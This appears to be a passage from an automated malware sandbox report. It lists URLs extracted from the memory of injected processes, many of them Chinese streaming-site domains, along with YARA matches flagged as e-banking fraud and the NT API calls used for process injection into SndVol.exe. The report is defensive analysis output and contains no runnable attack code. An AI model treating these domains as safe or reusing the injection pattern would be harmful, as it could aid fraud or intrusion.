                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/broadcast.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/index.umd.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/js.js
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/nc.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/pullup.js
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/realNameAuth.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.pn
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.pn
Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp
String found in binary or memory:
    http://www.linguarama.net
    http://www.liuyuezhibo.net
    http://www.mediaexpo.net
    http://www.mexicolibre.net
    http://www.miaozhaozhibo.com
    http://www.mibanzhibo.net
    http://www.mierzhibo.com/binding
    http://www.mijianzhibo.net

Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp
String found in binary or memory:
    http://www.minglianzhibo.net

Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp
String found in binary or memory:
    http://www.moneysoft.net
    http://www.mozizhibo.net
    http://www.niuniuzhibo.net
    http://www.noscope.net
    http://www.nvdizhibo.net
    http://www.pasiones.net
    http://www.pessoas.net
    http://www.pharco.net/binding
    http://www.qigezhibo.net
    http://www.qingtingzhibo.net

Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp
String found in binary or memory:
    http://www.qiyuezhibo.net

Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp
String found in binary or memory:
    http://www.qualityoffice.net
    http://www.radiodrama.net
    http://www.risna.net
    http://www.sarfa.net
    http://www.sencare.net
    http://www.shalizhibo.net
    http://www.sidma.net
    http://www.smartmonday.net
    http://www.startuptalent.net
    http://www.tanhuazhibo.net
    http://www.testoprime.net
    http://www.thebossclub.net
    http://www.thecakelady.net
    http://www.thecakelady.net/binding
    http://www.thetilt.net
    http://www.thetrees.net

Source: SndVol.exe, 00000010.00000002.3513023367.000000000630C000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000038EC000.00000004.00000001.00040000.00000000.sdmp
String found in binary or memory:
    http://www.thinkphp.cn

Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp
String found in binary or memory:
    http://www.togethertime.net
    http://www.uwrf.net
    http://www.webcruiser.net
    http://www.webuyboats.net
    http://www.westmedical.net
    http://www.workandhealth.net
    http://www.wuhaozhibo.com
    http://www.wuyezhibo.com
    http://www.wuyuezhibo.com
    http://www.wuyuezhibo.net
    http://www.xianglizhibo.net
    http://www.xiangxiangzhibo.com
    http://www.xiaoaizhibo.net
    http://www.xiaoqizhibo.net
    http://www.xingaizhibo.net
    http://www.xinghuizhibo.com
    http://www.xinghuizhibo.net
    http://www.xiuchangzhibo.com
    http://www.xiupazhibo.net
    http://www.xuanmozhibo.net
    http://www.yanyangzhibo.net
    http://www.yanyuzhibo.net
    http://www.yechuizhibo.com
    http://www.yewuzhibo.net
    http://www.yeyanzhibo.com
    http://www.yeyuezhi.net
    http://www.yinhezhibo.net
    http://www.yuemanzhibo.com
    http://www.yumizhibo.net
    http://www.yushenzhibo.com
    http://www.yutongzhibo.net
    http://www.ziah.net
    http://www.zootech.net

Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
    https://ac.ecosia.org?q=

Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp
String found in binary or memory:
    https://beian.miit.gov.cn/#/Integrated/index

Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    https://duckduckgo.com/ac/?q=
    https://duckduckgo.com/chrome_newtabv20
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=

Source: edb.log.7.dr
String found in binary or memory:
    https://g.live.com/odclientsettings/Prod-C:

Source: svchost.exe, 00000007.00000003.1204737878.0000023C0CE60000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr
String found in binary or memory:
    https://g.live.com/odclientsettings/ProdV2-C:

Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
    https://gemini.google.com/app?q=

Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp
String found in binary or memory:
    https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico

Source: SndVol.exe, 00000010.00000003.1577558958.0000000003575000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory:
    https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SndVol.exe, 00000010.00000002.3510287029.000000000356E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: SndVol.exe, 00000010.00000003.1577558958.0000000003575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2FF
                Source: SndVol.exe, 00000010.00000002.3510287029.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10333
                Source: SndVol.exe, 00000010.00000002.3510287029.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: SndVol.exe, 00000010.00000002.3510287029.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: SndVol.exe, 00000010.00000003.1576529746.00000000084A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: SndVol.exe, 00000010.00000003.1586108305.0000000008568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/

                E-Banking Fraud

                Source: Yara match | File source: 5.2.ungziped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.ungziped_file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3512178205.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1400004101.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3512080555.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0042CC83 NtClose
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222B60 NtClose, LdrInitializeThunk
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012235C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01224340 NtSetContextThread
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01224650 NtSuspendThread
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222BA0 NtEnumerateValueKey
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222B80 NtQueryInformationFile
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222BE0 NtQueryValueKey
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222BF0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222AB0 NtWaitForSingleObject
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222AF0 NtWriteFile
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222AD0 NtReadFile
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222D30 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222D00 NtSetInformationFile
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222D10 NtMapViewOfSection
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222DB0 NtEnumerateKey
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222DD0 NtDelayExecution
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222C00 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222C60 NtCreateKey
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222CA0 NtQueryInformationToken
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222CF0 NtOpenProcess
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222CC0 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222F30 NtCreateSection
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222F60 NtCreateProcessEx
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222FA0 NtQuerySection
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222FB0 NtResumeThread
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222F90 NtProtectVirtualMemory
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222FE0 NtCreateFile
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222E30 NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222EA0 NtAdjustPrivilegesToken
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222E80 NtReadVirtualMemory
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01222EE0 NtQueueApcThread
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01223010 NtOpenDirectoryObject
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01223090 NtSetValueKey
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012239B0 NtGetContextThread
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01223D10 NtOpenProcessToken
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01223D70 NtOpenThread
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05274650 NtSuspendThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05274340 NtSetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272D30 NtUnmapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272D10 NtMapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272DD0 NtDelayExecution, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272C60 NtCreateKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272CA0 NtQueryInformationToken, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272F30 NtCreateSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272FB0 NtResumeThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272FE0 NtCreateFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272E80 NtReadVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272EE0 NtQueueApcThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272BA0 NtEnumerateValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272BE0 NtQueryValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272AF0 NtWriteFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272AD0 NtReadFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052735C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052739B0 NtGetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05272AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05273010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05273090 NtSetValueKey
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05273D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05273D70 NtOpenThread
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C9330 NtCreateFile
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C97A0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C9640 NtClose
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C95A0 NtDeleteFile
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C94A0 NtReadFile
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_0555F976 NtMapViewOfSection
                Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 0_2_00EB3E40
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 0_2_00EBD6FC
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 0_2_02B66B78
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 0_2_02B60130
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 0_2_02B60120
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 0_2_02B66B68
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00418C13
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00402980
